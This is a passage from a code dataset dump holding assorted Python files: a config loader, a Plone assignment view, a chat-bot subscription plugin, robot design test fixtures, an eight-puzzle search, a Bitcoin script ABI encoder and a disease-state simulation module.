sequence_value\n","sub_path":"izi_pos_revenue_allocation/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"623199399","text":"import yaml\nimport os\n\n\nclass Config:\n\n _instance = None\n\n __slots__ = [\n '_path',\n \n 'DEBUG',\n 'PORT',\n 'HOST',\n\n 'DBHOST',\n 'DBPORT',\n 'DBNAME',\n 'DBUSER',\n 'DBPASSWORD',\n ]\n\n def __init__(self, yaml_file: str):\n self._path = yaml_file\n self._read()\n\n def __call__(cls, *args, **kwargs):\n if cls is not cls._instance:\n instance = super().__call__(*args, **kwargs)\n cls._instance = instance\n return cls._instance\n \n def to_dict(self):\n return {field.lower(): getattr(self, field) for field in self.__slots__}\n\n def _read(self):\n if not os.path.exists(self._path):\n raise AttributeError(f\"Config yaml doesnot exist: {self._path}\")\n\n with open(self._path) as config_file:\n config_content = config_file.read()\n config_yaml = 
yaml.safe_load(config_content)\n\n for k, v in config_yaml.items():\n k = k.upper()\n if k in self.__slots__:\n setattr(self, k, v)","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"631945665","text":"# -*- coding: utf-8 -*-\n\"\"\"Module providing faculty member assignment functionality\"\"\"\nfrom Acquisition import aq_inner\nfrom plone import api\nfrom plone.protect.utils import addTokenToUrl\nfrom Products.Five.browser import BrowserView\nfrom zope.lifecycleevent import modified\nfrom zope.publisher.interfaces.browser import IPublishTraverse\nfrom zope.interface import implementer\n\nfrom hph.faculty.facultymember import IFacultyMember\n\nfrom hph.publications import MessageFactory as _\n\n\nclass FacultyMemberAssignment(BrowserView):\n \"\"\" Manage publication faculty member assignments \"\"\"\n\n def __call__(self):\n return self.render()\n\n @property\n def traverse_subpath(self):\n return self.subpath\n\n def publishTraverse(self, request, name):\n if not hasattr(self, 'subpath'):\n self.subpath = []\n self.subpath.append(name)\n return self\n\n def render(self):\n return self.index()\n\n def generate_protected_url(self, url):\n return addTokenToUrl(url)\n\n def selectable_faculty_members(self):\n faculty_members = api.content.find(\n context=api.portal.get(),\n object_provides=IFacultyMember,\n review_state='published',\n sort_on='lastname'\n )\n return faculty_members\n\n def has_active_assignment(self, uuid):\n context = aq_inner(self.context)\n context_uid = api.content.get_uuid(obj=context)\n faculty_member = api.content.get(UID=uuid)\n assignments = getattr(faculty_member, 'associatedPublications', None)\n if assignments and context_uid in assignments:\n return True\n return False\n\n\n@implementer(IPublishTraverse)\nclass FacultyMemberAssignmentFactory(BrowserView):\n \"\"\" Factory view to set and delete assignments \"\"\"\n\n def __call__(self):\n return self.render()\n\n @property\n def traverse_subpath(self):\n return self.subpath\n\n def publishTraverse(self, request, name):\n if not hasattr(self, 'subpath'):\n self.subpath = []\n self.subpath.append(name)\n return self\n\n def render(self):\n context = aq_inner(self.context)\n faculty_member_uid = self.traverse_subpath[0]\n action = self.traverse_subpath[1]\n faculty_member = api.content.get(UID=faculty_member_uid)\n assignments = getattr(faculty_member, 'associatedPublications', None)\n if assignments is None:\n assignments = list()\n uuid = api.content.get_uuid(obj=context)\n if action == 'remove':\n if uuid in assignments:\n assignments.remove(uuid)\n else:\n assignments.append(uuid)\n # Store updated assignment list\n setattr(faculty_member, 'associatedPublications', assignments)\n modified(faculty_member)\n faculty_member.reindexObject(idxs='modified')\n next_url = '{0}/@@faculty-member-assignment?updated=true'.format(\n context.absolute_url())\n api.portal.show_message(\n message=_(u\"Faculty member successfully assigned\"),\n request=self.request)\n return self.request.response.redirect(next_url)\n","sub_path":"src/hph.publications/hph/publications/browser/assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":3175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"86321070","text":"import asyncio\nfrom typing import Optional\n\nfrom loguru import logger\nfrom nonebot import CommandGroup, 
CommandSession\nfrom nonebot import permission as perm\nfrom nonebot.command import call_command\nfrom nonebot.command.argfilter import controllers, extractors, validators\n\n\nfrom app.services.subscribe.school_notice import get_rss_list\nfrom app.services.subscribe.score import get_score_subscribes\nfrom app.services.subscribe.wrapper import handle_message, get_subs, handle_rm\n\n__plugin_name__ = \"订阅\"\n__plugin_short_description__ = \"订阅 通知/成绩/考试 等,命令: subscribe\"\n__plugin_usage__ = r\"\"\"添加订阅:\n - 订阅\n - 添加订阅\n - 新建订阅\n - subscribe\n 然后会提示输入序号,你也可以直接在后面加上序号,如:\n - 订阅 1\n查看订阅:\n - 查看订阅\n - 订阅列表\n - subscribe show\n\n移除订阅:\n - 移除订阅\n - 取消订阅\n - 停止订阅\n - 删除订阅\n - subscribe rm\n 然后会提示输入序号,你也可以直接在后面加上序号,如:\n - 移除订阅 1\n - 移除订阅 all\n\"\"\".strip()\n\ncg = CommandGroup(\n \"subscribe\", permission=perm.PRIVATE | perm.GROUP_ADMIN | perm.DISCUSS\n)\n\n\ndef get_subscribe_lst() -> str:\n msg = \"\"\n msg += get_rss_list().strip() + \"\\n\"\n msg += get_score_subscribes().strip() + \"\\n\"\n\n return msg\n\n\n@cg.command(\n \"subscribe\", aliases=[\"subscribe\", \"订阅\", \"添加订阅\", \"新增订阅\", \"新建订阅\"], only_to_me=False\n)\nasync def subscribe(session: CommandSession):\n message = session.get(\n \"message\",\n prompt=f\"你想订阅什么内容呢?(请输入序号,也可输入 `取消、不` 等语句取消):\\n{get_subscribe_lst()}\",\n arg_filters=[\n controllers.handle_cancellation(session),\n str.lstrip,\n validators.not_empty(\"请输入有效内容哦~\"),\n ],\n )\n await handle_message(session.event, message)\n\n\n@subscribe.args_parser\nasync def _(session: CommandSession):\n if session.is_first_run:\n if session.current_arg:\n session.state[\"message\"] = session.current_arg\n return\n\n\n@cg.command(\"show\", aliases=[\"查看订阅\", \"我的订阅\", \"订阅列表\"], only_to_me=False)\nasync def _(session: CommandSession):\n subs = session.state.get(\"subs\") or await get_subs(session.event)\n\n if not subs:\n session.finish(\"你还没有订阅任何内容哦\")\n\n for k, v in subs.items():\n await session.send(format_subscription(k, v))\n await asyncio.sleep(0.05)\n session.finish(f\"以上是所有的 {len(subs)} 个订阅\")\n\n\n@cg.command(\"rm\", aliases=[\"取消订阅\", \"停止订阅\", \"关闭订阅\", \"删除订阅\", \"移除订阅\"], only_to_me=False)\nasync def unsubscribe(session: CommandSession):\n subs = await get_subs(session.event)\n logger.info(f\"subs: {subs}\",)\n index: Optional[str] = session.state.get(\"index\")\n logger.info(f\"session.state: {session.state}\",)\n if index is None:\n session.state[\"subs\"] = subs\n await call_command(\n session.bot,\n session.ctx,\n (\"subscribe\", \"show\"),\n args={\"subs\": subs},\n disable_interaction=True,\n )\n\n if not subs:\n session.finish()\n\n index = session.get(\n \"index\",\n prompt=\"你想取消哪一个订阅呢?(请发送序号,或者 `取消`)\",\n arg_filters=[\n extractors.extract_text,\n controllers.handle_cancellation(session),\n ],\n )\n\n if index:\n await handle_rm(session.event, index)\n\n\n@unsubscribe.args_parser\nasync def _(session: CommandSession):\n if session.is_first_run:\n if session.current_arg:\n session.state[\"index\"] = session.current_arg\n\n\ndef format_subscription(k, v) -> str:\n return f\"序号:{k}\\n\" f\"订阅名称:\" f\"{v}\\n\"\n","sub_path":"app/bot/subscribe/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"487394129","text":"'''\nCreated on Jan 15, 2014\n\n@author: tariktosun\n'''\nfrom Embedding.SmoresModule import SmoresModule\nfrom Embedding.SmoresDesign import SmoresDesign\nimport copy\n\n\ndef setUpGrasperWalker(test_object):\n '''\n Sets up 
fixtures for the grasper and walker designs in the test class given n \n as arg.\n '''\n ''' Grasper design: '''\n g_modules = [SmoresModule('1', 0, []),\n SmoresModule('2', 1, [3,2]),\n SmoresModule('3', 1, [3,2]),\n SmoresModule('4', 1, [3,0,2]),\n SmoresModule('5', 1, [3,2]),\n SmoresModule('6', 1, [3,2]),\n SmoresModule('7', 1, [3,0,2]),\n ]\n g_small = copy.deepcopy( g_modules )\n g_smaller = copy.deepcopy( g_modules )\n # The -1's here are to make the code more readable when compared with the\n # original drawings of the designs I made (where modules numbers start at 1\n # rather than 0)\n g_modules[1-1].add_child_module( 2, g_modules[5-1] )\n g_modules[1-1].add_child_module( 3, g_modules[2-1] )\n g_modules[2-1].add_child_module( 0, g_modules[3-1] )\n g_modules[3-1].add_child_module( 0, g_modules[4-1] )\n g_modules[5-1].add_child_module( 0, g_modules[6-1] )\n g_modules[6-1].add_child_module( 0, g_modules[7-1] )\n grasper = SmoresDesign( g_modules[1-1], g_modules )\n test_object.grasper = grasper\n \n # now make a smaller version:\n g_small[1-1].add_child_module( 2, g_small[5-1] )\n #g_small[1-1].add_child_module( 3, g_small[2-1] )\n g_small[5-1].nodes[0].active = False #need to hack this for it to work.\n #grasper_small = SmoresDesign( g_small[1-1], [g_small[1-1], g_small[2-1], g_small[5-1]])\n grasper_small = SmoresDesign( g_small[1-1], [g_small[1-1], g_small[5-1]])\n test_object.grasper_small = grasper_small\n \n # ...and an even smaller version:\n grasper_smaller = SmoresDesign( g_smaller[1-1], [g_smaller[1-1]] )\n test_object.grasper_smaller = grasper_smaller\n \n ''' Walker design: '''\n w_modules = [SmoresModule('1', 1, [2,3,0] ),\n SmoresModule('2', 1, [2,3] ),\n SmoresModule('3', 1, [2,3] ),\n \n SmoresModule('4', 3, [2] ),\n \n SmoresModule('5', 0, [2,3] ),\n SmoresModule('6', 0, [2,3] ),\n SmoresModule('7', 0, [2,3] ),\n \n SmoresModule('8', 0, [2,3] ),\n SmoresModule('9', 0, [2,3] ),\n SmoresModule('10', 0, [2,3] ),\n \n SmoresModule('11', 2, [3] ),\n \n SmoresModule('12', 1, [2,3] ),\n SmoresModule('13', 1, [2,3] ),\n SmoresModule('14', 1, [2,3,0] ),\n ]\n \n w_small = copy.deepcopy( w_modules )\n w_smaller = copy.deepcopy( w_modules )\n \n # First I am connecting the bottom legs (which will be the grasper)\n # right leg:\n w_modules[11-1].add_child_module( 0, w_modules[12-1] )\n w_modules[12-1].add_child_module( 0, w_modules[13-1] )\n w_modules[13-1].add_child_module( 0, w_modules[14-1] )\n # left leg:\n w_modules[11-1].add_child_module( 1, w_modules[10-1] )\n w_modules[10-1].add_child_module( 1, w_modules[9-1] )\n w_modules[9-1].add_child_module( 1, w_modules[8-1] )\n # now for the top two legs:\n #right leg:\n w_modules[11-1].add_child_module( 2, w_modules[4-1] )\n # Note that above is allowed because 11 is the root module.\n w_modules[4-1].add_child_module( 0, w_modules[3-1] )\n w_modules[3-1].add_child_module( 0, w_modules[2-1] )\n w_modules[2-1].add_child_module( 0, w_modules[1-1] )\n # left leg:\n w_modules[4-1].add_child_module( 1, w_modules[5-1] )\n w_modules[5-1].add_child_module( 1, w_modules[6-1] )\n w_modules[6-1].add_child_module( 1, w_modules[7-1] )\n # Node 11 is the root.\n walker = SmoresDesign( w_modules[11-1], w_modules ) \n test_object.walker= walker\n \n # now make a small version:\n w_small[11-1].add_child_module( 0, w_small[12-1] )\n w_small[11-1].add_child_module( 1, w_small[10-1] )\n walker_small = SmoresDesign( w_small[11-1], [w_small[11-1], w_small[12-1], w_small[10-1]])\n test_object.walker_small = walker_small\n \n # ... 
and an even smaller version:\n w_smaller[11-1].add_child_module( 1, w_smaller[10-1] )\n walker_smaller = SmoresDesign( w_smaller[11-1], [ w_smaller[11-1], w_smaller[10-1] ])\n test_object.walker_smaller = walker_smaller\n \n \n \n \n \n ","sub_path":"Design_Merging/test/fixtures_grasper_walker.py","file_name":"fixtures_grasper_walker.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"123137840","text":"# Name: Hieu Le - htl5683@truman.edu\n# Name: Anh Nguyen - adn6627@truman.edu\n\n# File eightPuzzle.py\n# Implements the Eight Puzzle problem for state space search\n\n# Node Expansions\n# Problem | BFS | A*(tiles) | A*(dist) | Steps\n# A 7 3 3 2\n# B 69 8 7 6\n# C 183 18 9 8\n# D 807 40 24 10\n# E 831 40 24 10\n# F 1557 95 18 12\n# G 6005 269 46 15\n# H 46690 3616 183 20\n\n\nfrom informedSearch import *\n\n\nclass EightPuzzleState(InformedProblemState):\n \"\"\"\n Each state in the Eight Puzzle problem is characterized by a 2-dimensional\n array representing the puzzle grid. The grid is filled with numbers from 0\n to 9 with the blank square denoted with a 0 value.\n \"\"\"\n\n def __init__(self, grid):\n self.grid = grid\n if grid is not None:\n # Extract the position of the blank square from the current grid.\n self.blank_row, self.blank_col = self.find_position(0)\n\n def __str__(self):\n \"\"\"Returns a string representation of this state\"\"\"\n rep = \"\"\n for row in range(len(self.grid)):\n for col in range(len(self.grid[row])):\n rep += '%s ' % self.grid[row][col]\n rep += '\\n'\n return rep\n\n def illegal(self):\n \"\"\"Tests whether this state is illegal\"\"\"\n return self.grid is None\n\n def equals(self, state):\n \"\"\"\n Determines whether the state instance and the given state are equal\n \"\"\"\n return self.grid == state.grid\n\n # Each operator corresponds to shifting the blank square in each of the four\n # possible directions. This induces changes in the row and column number of\n # the blank square.\n OPERATORS = [[-1, 0], [0, 1], [1, 0], [0, -1]]\n\n def operatorNames(self):\n \"\"\"\n Returns a list of operator names in the same order as the applyOperators\n method. 
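For\n example, the first operator, [-1, 0], moves the blank square up one row, so it\n is reported as 'Slide Down': the tile above the blank slides down into it. 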
The returned name corresponds to the action applied on the\n numbered square that is moved into the blank square.\n \"\"\"\n return ['Slide Down', 'Slide Left', 'Slide Up', 'Slide Right']\n\n def applyOperators(self):\n \"\"\"\n Returns a list of possible successors to the current state, some of\n which maybe illegal.\n \"\"\"\n next_states = []\n\n for operator in self.OPERATORS:\n next_board = [row[:] for row in self.grid]\n # Compute the new position of the blank square.\n next_blank_row = self.blank_row + operator[0]\n next_blank_col = self.blank_col + operator[1]\n\n if (0 <= next_blank_row < len(next_board)\n and 0 <= next_blank_col < len(next_board[next_blank_row])):\n # Exchange two adjacent squares.\n next_board[self.blank_row][self.blank_col], \\\n next_board[next_blank_row][next_blank_col] = \\\n next_board[next_blank_row][next_blank_col], \\\n next_board[self.blank_row][self.blank_col]\n next_states.append(EightPuzzleState(next_board))\n else:\n next_states.append(EightPuzzleState(None))\n\n return next_states\n\n def heuristic(self, goal):\n \"\"\"Returns the estimated cost of reaching the goal from this state.\"\"\"\n # return 0\n # return self.get_hamming_distance(goal)\n return self.get_manhattan_distance(goal)\n\n def get_hamming_distance(self, other):\n \"\"\"\n Computes the Hamming distance from this state to other, i.e. the number\n of out-of-place squares\n \"\"\"\n hamming_distance = 0\n for value in range(1, 9):\n actual_row, actual_col = self.find_position(value)\n expected_row, expected_col = other.find_position(value)\n if not (actual_row == expected_row and actual_col == expected_col):\n hamming_distance += 1\n return hamming_distance\n\n def get_manhattan_distance(self, other):\n \"\"\"Computes the Manhattan distance from this state to other\"\"\"\n manhattan_distance = 0\n\n for value in range(1, 9):\n actual_row, actual_col = self.find_position(value)\n expected_row, expected_col = other.find_position(value)\n manhattan_distance += abs(expected_row - actual_row)\n manhattan_distance += abs(expected_col - actual_col)\n\n return manhattan_distance\n\n def find_position(self, value):\n \"\"\"Returns row and column number of the cell containing value\"\"\"\n for row in range(len(self.grid)):\n for col in range(len(self.grid[row])):\n if self.grid[row][col] == value:\n return row, col\n return -1, -1\n\n\ngoalState = EightPuzzleState(\n [[1, 2, 3],\n [8, 0, 4],\n [7, 6, 5]])\n\ninitialStateBoards = [\n [[1, 3, 0],\n [8, 2, 4],\n [7, 6, 5]],\n\n [[1, 3, 4],\n [8, 6, 2],\n [0, 7, 5]],\n\n [[0, 1, 3],\n [4, 2, 5],\n [8, 7, 6]],\n\n [[7, 1, 2],\n [8, 0, 3],\n [6, 5, 4]],\n\n [[8, 1, 2],\n [7, 0, 4],\n [6, 5, 3]],\n\n [[2, 6, 3],\n [4, 0, 5],\n [1, 8, 7]],\n\n [[7, 3, 4],\n [6, 1, 5],\n [8, 0, 2]],\n\n [[7, 4, 5],\n [6, 0, 3],\n [8, 1, 2]]\n]\n\nInformedSearch(EightPuzzleState(initialStateBoards[0]), goalState)\n","sub_path":"heuristic-search/eightPuzzle.py","file_name":"eightPuzzle.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"21221688","text":"import copy\nimport re\nfrom bitcoinx import TxInputContext, InterpreterLimits, MinerPolicy, Script, pack_byte\n\nimport scryptlib.utils as utils\nfrom scryptlib.compiler_wrapper import ABIEntityType\nfrom scryptlib.types import Struct, Int, Bool\n\n\nclass ABICoder:\n\n def __init__(self, abi, aliases):\n self.abi = abi\n self.aliases = aliases\n\n def encode_constructor_call(self, contract, hex_script, *args):\n 
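\"\"\"Encode a constructor call: replace each <param> placeholder in\n hex_script with the hex encoding of the matching argument (array and\n struct arguments are flattened first) and wrap the resulting locking\n script in a FunctionCall.\"\"\"\n 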
abi_constructor = self.abi_constructor()\n c_params = self.__get_abi_params(abi_constructor)\n\n if len(args) != len(c_params):\n raise Exception('Wrong number of arguments passed to constructor. ' \\\n 'Expected {}, but got {}.'.format(len(c_params), len(args)))\n\n _c_params = []\n _args = []\n for idx, param in enumerate(c_params):\n arg = args[idx]\n arg = utils.primitives_to_scrypt_types(arg)\n resolved_type = utils.resolve_type(param['type'], self.aliases)\n if utils.is_array_type(resolved_type):\n elem_type, array_sizes = utils.factorize_array_type_str(resolved_type)\n\n if not utils.check_array(arg, elem_type, array_sizes):\n raise Exception('Constructors parameter with index {} should be of type \"{}\".'.format(idx, resolved_type))\n\n flattened_arr = utils.flatten_array(arg, param['name'], resolved_type)\n for obj in flattened_arr:\n _c_params.append({ 'name': obj['name'], 'type': obj['type'] })\n _args.append(obj['value'])\n elif utils.is_struct_type(resolved_type):\n if arg.final_type != resolved_type:\n raise Exception('Constructors parameter with index {} should be Struct object of type \"{}\". ' \\\n 'Got struct of type \"{}\" instead.'.format(idx, param['type'], arg.type_str))\n\n flattened_struct = utils.flatten_struct(arg, param['name'])\n for obj in flattened_struct:\n _c_params.append({ 'name': obj['name'], 'type': obj['type'] })\n _args.append(obj['value'])\n else:\n _c_params.append(param)\n _args.append(arg)\n\n finalized_hex_script = hex_script\n for idx, param in enumerate(_c_params):\n if not '<{}>'.format(param['name']) in hex_script:\n raise Exception('Missing \"{}\" contract constructor parameter in passed args.'.format(param['name']))\n param_regex = re.compile(escape_str_for_regex('<{}>'.format(param['name'])))\n finalized_hex_script = re.sub(param_regex, self.encode_param(_args[idx], param), finalized_hex_script)\n\n # Replace inline assembly variable placeholders in locking script with the actual arguments.\n # TODO: Check if each value if instance of ScryptType\n if contract.inline_asm_vars:\n for key, val in contract.inline_asm_vars.items():\n param_regex = re.compile(escape_str_for_regex('<{}>'.format(key)))\n finalized_hex_script = re.sub(param_regex, val.hex, finalized_hex_script)\n\n locking_script = Script.from_hex(finalized_hex_script)\n return FunctionCall('constructor', args, contract, locking_script=locking_script)\n\n def encode_pub_function_call(self, contract, name, *args):\n for entity in self.abi:\n if entity['name'] == name:\n if len(entity['params']) != len(args):\n raise Exception('Wrong number of arguments passed to function call \"{}\", ' \\\n 'expected {}, but got {}.'.format(name, len(entity['params']), len(args)))\n hex_script = self.encode_params(args, entity['params'])\n if len(self.abi) > 2 and 'index' in entity:\n pub_func_index = entity['index']\n hex_script += '{}'.format(Int(pub_func_index).hex) # TODO\n unlocking_script = Script.from_hex(hex_script) \n return FunctionCall(name, args, contract, unlocking_script=unlocking_script)\n\n def encode_params(self, args, param_entities):\n res = []\n for idx, arg in enumerate(args):\n res.append(self.encode_param(arg, param_entities[idx]))\n return ''.join(res)\n\n def encode_param(self, arg, param_entity):\n resolved_type = utils.resolve_type(param_entity['type'], self.aliases)\n if utils.is_array_type(resolved_type):\n if isinstance(arg, list):\n return self.encode_param_array(arg, param_entity)\n else:\n scrypt_type = arg.type_str\n raise Exception('Expected parameter \"{}\" as 
\"{}\", but got \"{}\".'.format(param_entity['name'],\n resolved_type, scrypt_type))\n if utils.is_struct_type(resolved_type):\n if isinstance(arg, Struct):\n if resolved_type != arg.final_type:\n raise Exception('Expected struct of type \"{}\", but got struct of type \"{}\".'.format(\n param_entity['name'], resolved_type, arg.final_type))\n else:\n scrypt_type = arg.type_str\n raise Exception('Expected parameter \"{}\" as struct of type \"{}\", but got \"{}\".'.format(\n param_entity['name'], resolved_type, scrypt_type))\n\n scrypt_type = utils.type_of_arg(arg)\n if resolved_type != scrypt_type:\n raise Exception('Wrong argument type. Expected \"{}\", but got \"{}\".'.format(param_entity['type'], \n scrypt_type))\n\n if isinstance(arg, bool):\n arg = Bool(arg)\n elif isinstance(arg, int):\n arg = Int(arg)\n\n return arg.hex\n\n def encode_param_array(self, args, param_entity):\n if len(args) == 0:\n raise Exception('Empty arrays not allowed.')\n \n first_arg_type = type(args[0])\n for arg in args:\n if type(arg) != first_arg_type:\n raise Exception('Array arguments are not of same type.')\n\n resolved_type = utils.resolve_type(param_entity['type'], self.aliases)\n elem_type, array_sizes = utils.factorize_array_type_str(resolved_type)\n\n if not utils.check_array(args, elem_type, array_sizes):\n raise Exception('Array check failed for \"{}\".'.format(param_entity['type']))\n\n res_buff = []\n for arg in utils.flatten_array(args, param_entity['name'], resolved_type):\n res_buff.append(self.encode_param(arg['value'], { 'name': arg['name'], 'type': arg['type'] }))\n return ''.join(res_buff)\n\n def abi_constructor(self):\n constructor_abi = None\n for entity in self.abi:\n if entity['type'] == ABIEntityType.CONSTRUCTOR.value:\n constructor_abi = entity\n break\n return constructor_abi\n\n @staticmethod\n def __get_abi_params(abi_entity):\n return abi_entity.get('params', [])\n\n\nclass FunctionCall:\n\n def __init__(self, method_name, params, contract, locking_script=None, unlocking_script=None):\n if not (locking_script or unlocking_script):\n raise Exception('Binding locking_script and unlocking_script can\\'t both be empty.')\n\n self.contract = contract\n self.locking_script = locking_script\n self.unlocking_script = unlocking_script\n self.method_name = method_name\n\n self.args = []\n for entity in self.contract.abi:\n if (method_name == 'constructor' and entity['type'] == 'constructor') or \\\n ('name' in entity and entity['name'] == method_name):\n for idx, param in enumerate(entity['params']):\n self.args.append({\n 'name': param['name'],\n 'type': param['type'],\n 'value': params[idx]\n })\n\n def verify(self, tx_input_context=utils.create_dummy_input_context(), interpreter_limits=None,\n use_contract_script_pair=True):\n '''\n Evaluate lock and unlock script pair using the passed TxInputContext object.\n Additionally an InterpreterLimits object can be passed to limit the scope of verification.\n\n If not TxInputContext object is passed, a dummy context object gets created and used in the verification \n process.\n\n If use_contract_script_pair is set to True (defaults to True), then evaluate the scriptPubKey and scriptSig\n pair of the contract object, instead of the ones passed via the TxInputContext object.\n '''\n assert isinstance(tx_input_context, TxInputContext)\n\n if not self.unlocking_script:\n raise Exception('Cannot verify function \"{}\". 
\\\n FunctionCall object is missing unlocking_script property.'.format(self.method_name))\n\n if not interpreter_limits:\n policies = [\n # A fairly restrictive policy\n MinerPolicy(100_000, 64, 20_000, 1_000, 16),\n # A loose policy\n MinerPolicy(10_000_000, 256, 10_000_000, 32_000, 256)\n ]\n interpreter_limits = InterpreterLimits(policies[1], is_genesis_enabled=True, is_consensus=True, base_flags='consensus')\n\n # Make a deep copy of the passed TxInputContext object, because it may be modified from here on.\n tx_input_context = copy.deepcopy(tx_input_context)\n\n if use_contract_script_pair:\n self.update_input_context_scripts(tx_input_context)\n\n return tx_input_context.verify_input(interpreter_limits)\n\n def update_input_context_scripts(self, tx_input_context):\n '''\n Updates the unlocking input script (scriptSig) and the matching UTXOs locking script (scriptPubKey)\n to the unlocking script of this FunctionCall object and the locking script of the contract object it belongs to.\n\n Notice, that the function doesn't create a copy of the context object, but rather just modifies it.\n '''\n # Set unlock script for passed input context.\n input_index = tx_input_context.input_index\n tx_input_context.tx.inputs[input_index].script_sig = self.unlocking_script\n\n # Set utxo script to verify sciptSig against.\n tx_input_context.utxo.script_pubkey = self.contract.locking_script\n\n return tx_input_context\n\n @property\n def script(self):\n '''\n The function calls scriptSig.\n '''\n return self.unlocking_script\n\n\ndef escape_str_for_regex(string):\n special_chars = {'-', '\\\\', '^', '$', '*', '+', '?', '.', '(', ')', '|', '[', ']', '{', '}'}\n res_buff = []\n for c in string:\n if c in special_chars:\n res_buff.append('\\\\')\n res_buff.append(c)\n return ''.join(res_buff)\n","sub_path":"scryptlib/abi.py","file_name":"abi.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"394425421","text":"\"\"\"\n==============\nDisease States\n==============\n\nThis module contains tools to manage standard disease states.\n\n\"\"\"\nfrom typing import Callable, Dict, List\n\nimport numpy as np\nimport pandas as pd\nfrom vivarium.framework.population import PopulationView, SimulantData\nfrom vivarium.framework.state_machine import State, Transient, Transition\nfrom vivarium.framework.values import list_combiner, union_post_processor\n\nfrom vivarium_public_health.disease.transition import (\n ProportionTransition,\n RateTransition,\n TransitionString,\n)\nfrom vivarium_public_health.utilities import is_non_zero\n\n\nclass BaseDiseaseState(State):\n def __init__(\n self, cause, name_prefix=\"\", side_effect_function=None, cause_type=\"cause\", **kwargs\n ):\n super().__init__(name_prefix + cause, **kwargs) # becomes state_id\n self.cause_type = cause_type\n self.cause = cause\n\n self.side_effect_function = side_effect_function\n if self.side_effect_function is not None:\n self._sub_components.append(side_effect_function)\n\n self.event_time_column = self.state_id + \"_event_time\"\n self.event_count_column = self.state_id + \"_event_count\"\n\n @property\n def columns_created(self):\n return [self.event_time_column, self.event_count_column]\n\n # noinspection PyAttributeOutsideInit\n def setup(self, builder):\n \"\"\"Performs this component's simulation setup.\n\n Parameters\n ----------\n builder : `engine.Builder`\n Interface to several simulation tools.\n \"\"\"\n super().setup(builder)\n\n 
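# Cache the simulation clock and build a population view over this state's\n # event columns (plus the model and alive columns) so that\n # on_initialize_simulants can populate them at simulant creation.\n 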
self.clock = builder.time.clock()\n\n view_columns = self.columns_created + [self._model, \"alive\"]\n self.population_view = builder.population.get_view(view_columns)\n builder.population.initializes_simulants(\n self.on_initialize_simulants,\n creates_columns=self.columns_created,\n requires_columns=[self._model],\n )\n\n def on_initialize_simulants(self, pop_data: SimulantData) -> None:\n \"\"\"Adds this state's columns to the simulation state table.\"\"\"\n for transition in self.transition_set:\n if transition.start_active:\n transition.set_active(pop_data.index)\n\n pop_update = self.get_initial_event_times(pop_data)\n self.population_view.update(pop_update)\n\n def get_initial_event_times(self, pop_data: SimulantData) -> pd.DataFrame:\n return pd.DataFrame(\n {self.event_time_column: pd.NaT, self.event_count_column: 0}, index=pop_data.index\n )\n\n def _transition_side_effect(self, index, event_time):\n \"\"\"Updates the simulation state and triggers any side effects associated with this state.\n\n Parameters\n ----------\n index\n An iterable of integer labels for the simulants.\n event_time : pandas.Timestamp\n The time at which this transition occurs.\n\n \"\"\"\n pop = self.population_view.get(index)\n pop[self.event_time_column] = event_time\n pop[self.event_count_column] += 1\n self.population_view.update(pop)\n\n if self.side_effect_function is not None:\n self.side_effect_function(index, event_time)\n\n ##################\n # Public methods #\n ##################\n\n def get_transition_names(self) -> List[str]:\n transitions = []\n for trans in self.transition_set.transitions:\n _, _, init_state, _, end_state = trans.name.split(\".\")\n transitions.append(TransitionString(f\"{init_state}_TO_{end_state}\"))\n return transitions\n\n def add_transition(\n self,\n output: State,\n source_data_type: str = None,\n get_data_functions: Dict[str, Callable] = None,\n **kwargs,\n ) -> Transition:\n \"\"\"Builds a transition from this state to the given state.\n\n Parameters\n ----------\n output\n The end state after the transition.\n\n source_data_type\n the type of transition: either 'rate' or 'proportion'\n\n get_data_functions\n map from transition type to the function to pull that transition's data\n\n Returns\n -------\n vivarium.framework.state_machine.Transition\n The created transition object.\n\n \"\"\"\n transition_map = {\"rate\": RateTransition, \"proportion\": ProportionTransition}\n\n if not source_data_type:\n return super().add_transition(output, **kwargs)\n elif source_data_type in transition_map:\n t = transition_map[source_data_type](self, output, get_data_functions, **kwargs)\n self.transition_set.append(t)\n return t\n else:\n raise ValueError(f\"Unrecognized data type {source_data_type}\")\n\n\nclass SusceptibleState(BaseDiseaseState):\n def __init__(self, cause, *args, **kwargs):\n super().__init__(cause, *args, name_prefix=\"susceptible_to_\", **kwargs)\n\n def add_transition(\n self,\n output: State,\n source_data_type: str = None,\n get_data_functions: Dict[str, Callable] = None,\n **kwargs,\n ) -> Transition:\n if source_data_type == \"rate\":\n if get_data_functions is None:\n get_data_functions = {\n \"incidence_rate\": lambda builder, cause: builder.data.load(\n f\"{self.cause_type}.{cause}.incidence_rate\"\n )\n }\n elif \"incidence_rate\" not in get_data_functions:\n raise ValueError(\"You must supply an incidence rate function.\")\n elif source_data_type == \"proportion\":\n if \"proportion\" not in get_data_functions:\n raise ValueError(\"You must 
